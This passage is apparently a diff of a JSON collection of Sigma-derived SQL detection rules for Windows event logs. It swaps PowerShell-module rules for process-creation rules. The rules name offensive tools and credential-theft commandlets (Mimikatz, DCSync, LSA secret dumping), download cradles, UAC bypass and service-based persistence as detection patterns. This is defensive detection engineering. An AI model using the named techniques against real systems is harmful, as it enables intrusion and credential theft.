], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE 
'%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE 
'\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload 
LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", - "id": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", - "status": "test", - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "author": "frack113", + "title": "PUA - Potential PE Metadata Tamper Using Rcedit", + "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", + "status": "experimental", + "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", + "author": "Micah Babinski", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.t1036.003", + "attack.t1036", + "attack.t1027.005", + 
"attack.t1027" ], "falsepositives": [ - "Administrator script" + "Legitimate use of the tool by administrators or users to update metadata of a binary" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR ContextInfo LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (Payload LIKE '%get-aduser%' ESCAPE '\\' AND Payload LIKE '%-f %' ESCAPE '\\' AND Payload LIKE '%-pr %' ESCAPE '\\' AND Payload LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\') OR (ContextInfo LIKE '%get-aduser%' ESCAPE '\\' AND ContextInfo LIKE '%-f %' ESCAPE '\\' AND ContextInfo LIKE '%-pr %' ESCAPE '\\' AND ContextInfo LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_ad_group_reco.yml" + "filename": "proc_creation_win_pua_rcedit_execution.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", - "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix 
invrep_de, oscd.community", + "title": "HackTool - Jlaive In-Memory Assembly Execution", + "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "status": "experimental", + "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.003" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" ], - "filename": "posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" }, { - "title": "PowerShell Decompress Commands", - "id": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", - "status": "test", - "description": "A General detection for specific decompress 
commands in PowerShell logs. This could be an adversary decompressing files.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Msiexec Execute Arbitrary DLL", + "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", + "status": "experimental", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1140" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Expand-Archive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files 
(x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" ], - "filename": "posh_pm_decompress_commands.yml" + "filename": "proc_creation_win_msiexec_execute_dll.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE 
'%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", - "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Potential Persistence Attempt Via Existing Service Tampering", + "id": "38879043-7e1e-47a9-8d46-6bec88e201df", + "status": "test", + "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", + "author": "Sreeman", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1543.003", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' 
OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "title": "Nltest.EXE Execution", + "id": "903076ff-f442-475a-b667-4f246bcc203b", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Arun Chauhan", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1016", + "attack.t1018", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe'))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_nltest_execution.yml" }, { - "title": "Suspicious PowerShell Download - PoshModule", - 
"id": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_download.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", + "status": "test", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": 
"Markus Neis, @Karneades", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". 
